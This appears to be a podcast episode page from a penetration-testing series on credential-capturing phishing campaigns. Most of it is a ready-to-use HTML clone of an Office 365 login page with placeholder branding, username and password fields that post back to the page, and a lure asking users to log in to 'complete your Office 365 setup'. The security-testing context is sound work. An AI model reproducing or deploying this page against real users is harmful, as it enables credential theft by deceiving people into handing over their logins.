7MS #509: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 4

Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may "pre-click" malicious links before users ever actually do.

This phishing page has served us well:

<html><head><title>YourDomain.com - Office 365 Email Login</title>
<style>
body {
    background-image: url("https://YOURDOMAIN.com/static/backgroundimage.png");
        background-repeat:no-repeat;
       background-size:cover;
}
</style>
</head><body><br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
 <center><img src="https://YOURDOMAIN.com/static/owa.png"/></center>
<center><img src="https://YOURDOMAIN.com/static/COMPANYLOGO.png"/></center>
<br/>
<br/>
<br/>
<br/>
<br/>
<center>
<table style="width:40%">
  <tbody><tr>
    
        <th><form action="" method="post" name="form">
        <p style="color:black;"><label>User Name:</label>   <input name="username" type="text"/>
        </p><p style="color:black;"><label>Password:</label>    <input name="password" type="password"/>
        <br/>
        <br/>
        <input type="image" id="image" value="Login" src="https://YOURDOMAIN.com/static/signin.png">
        </p></form>
    </th>
</tr>
</tbody></table>

<br/>
<br/>
<center>
<p style="color:black;">
</p><p><b>Please login to complete your Office 365 setup.</b>
</p>
</center>

</center></body></html>